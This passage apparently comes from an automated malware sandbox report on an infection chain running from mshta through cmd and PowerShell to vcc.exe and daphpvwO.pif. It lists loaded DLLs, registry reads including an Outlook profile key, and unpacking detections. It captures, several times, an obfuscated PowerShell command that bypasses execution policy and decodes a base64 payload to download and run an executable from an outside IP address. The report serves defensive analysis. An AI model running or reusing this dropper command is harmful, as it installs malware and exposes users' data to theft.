                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: tquery.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: sppwmi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: sppcext.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: winscard.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\vcc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Links\daphpvwO.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: easinvoker.pdb source: vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461293441.000000007F320000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: daphpvwO.pif, 0000000B.00000002.3828826797.0000000028FE0000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000003.1474573472.0000000027510000.00000004.00000020.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829826144.000000002A3B1000.00000004.00000800.00020000.00000000.sdmp, daphpvwO.pif, 0000000B.00000002.3829143757.0000000029240000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: q7C:\Users\user\AppData\Local\Temp\gbdknv1n\gbdknv1n.pdb source: powershell.exe, 00000003.00000002.1492553926.00000000050D3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: vcc.exe, 00000006.00000003.1461924520.0000000000749000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020599000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461924520.0000000000778000.00000004.00000020.00020000.00000000.sdmp, vcc.exe, 00000006.00000003.1461293441.000000007F320000.00000004.00001000.00020000.00000000.sdmp, vcc.exe, 00000006.00000002.1498618356.0000000020570000.00000004.00001000.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Links\daphpvwO.pifUnpacked PE file: 11.2.daphpvwO.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\Links\daphpvwO.pifUnpacked PE file: 11.2.daphpvwO.pif.400000.0.unpack
                  Source: Yara matchFile source: 6.2.vcc.exe.21d9548.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.vcc.exe.2880000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.vcc.exe.21d9548.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1466196833.00000000021D9000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: 11.2.daphpvwO.pif.2a3b6458.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 11.2.daphpvwO.pif.2a3de990.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 11.2.daphpvwO.pif.29021b8e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 11.2.daphpvwO.pif.29240ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 11.2.daphpvwO.pif.2b930000.9.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 11.2.daphpvwO.pif.29020ca6.3.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                  Source: 11.2.daphpvwO.pif.29240000.5.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                  Source: 11.2.daphpvwO.pif.2a3b5570.7.raw.unpack, _.cs.Net Code: ___ System.Reflection.Assembly.Load(byte[])
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJxaCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtZVNwYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWnlreXp2ckVYViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNk9ZVUJaREdtOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIyNy4yMjguMjIvODQwL3ZjYy5leGUiLCIkZU52OkFQUERBVEFcdmNjLmV4ZSIsMCwwKTtzdEFSVC1TbEVlcCgzKTtpblZPS2UtSXRFbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcdmNjLmV4ZSI='+[CHaR]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWeRSHELl -eX ByPass -NOP -w 1 -c DeViceCREDEnTialDeploYmeNt.EXe ; ieX($(IeX('[SySTEm.texT.ENCoding]'+[ChAr]58+[CHAR]58+'uTF8.getSTrinG([SysTem.cOnvERT]'+[CHar]0x3a+[chAr]58+'fROMBAsE64sTRING('+[cHAR]0x22+'JDZPWVVCWkRHbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iZXJkRUZpTmlUSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1Pbi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiU0ltSXF0aixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMYVdYWXd3eE9vLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdWWHAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE11dU1ocnljLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZ4QnJ6ZnFkclIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRSAgICAgICAgICAgICAgI